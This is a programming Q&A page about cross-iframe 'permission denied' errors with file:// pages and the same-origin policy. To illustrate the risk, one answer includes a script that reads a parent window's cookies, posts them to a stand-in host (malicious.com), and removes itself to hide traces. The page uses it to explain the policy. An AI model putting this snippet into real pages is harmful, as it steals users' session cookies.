
javascript permission denied to access property

Tags:

javascript

I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

I am not doing this on the web. The src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in another frame.

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}
user2407689 asked Dec 12 '22 14:12


2 Answers

The code below

<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>

Throws

Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.

The protocols must match (e.g. the main window and the iframe protocols must be either file: or http: to name a couple).

The domains must match (e.g. the main window and the iframe domains must be example.com).

The ports must match (e.g. the main window and the iframe ports must be 80 or 8080).


This is to protect users from code being executed from malicious sites, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.

An example of malicious JavaScript code:

<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious.com/maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>
Isaac answered Dec 30 '22 11:12


Any JavaScript that attempts to access properties of a document on a different domain (e.g. in an iframe element) is in violation of the security concept called the same origin policy.

In computing, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site – a combination of scheme, hostname, and port number – to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.

Alex W answered Dec 30 '22 11:12
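
The scheme, host and port comparison that both answers describe, as an added example (not code from the question or from either answer). It uses the built-in URL class and models file: URLs as opaque origins, which is an assumption (the URL Standard leaves that choice to the browser); the function names and sample URLs are constructed for illustration.

```javascript
// Added example: models the browser's same-origin comparison for two URLs.
const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

// Returns {scheme, host, port} for tuple origins, or null for opaque origins.
function originTuple(urlString) {
  const u = new URL(urlString);
  // Only the schemes above get a tuple origin here. file:, data: and the rest
  // are modelled as opaque (assumption, see the lead-in).
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname,
    port: u.port || DEFAULT_PORTS[u.protocol], // URL drops default ports
  };
}

// Returns [] when same-origin, otherwise the reasons access is denied.
function originMismatch(a, b) {
  const ta = originTuple(a), tb = originTuple(b);
  // An opaque origin equals only itself, so two file: documents never match.
  // Comparing serialized origins ("null" === "null") would get this wrong.
  if (ta === null || tb === null) return ["opaque origin"];
  return ["scheme", "host", "port"].filter((k) => ta[k] !== tb[k]);
}

// Constructed sample URLs (not from the original page).
const samples = [
  ["http://example.com/a.html", "http://example.com:80/b.html"],
  ["http://example.com/", "https://example.com/"],
  ["http://example.com/", "http://example.iana.org/"],
  ["http://example.com/", "http://example.com:8080/"],
  ["file:///home/user/top.html", "file:///home/user/num_frame.html"],
];
for (const [a, b] of samples) {
  const why = originMismatch(a, b);
  console.log(a, "<->", b, why.length ? "DENIED: " + why.join(", ") : "same origin");
}
```

The last sample is the situation in the question: both documents sit side by side on disk, yet under this model neither can read the other's properties.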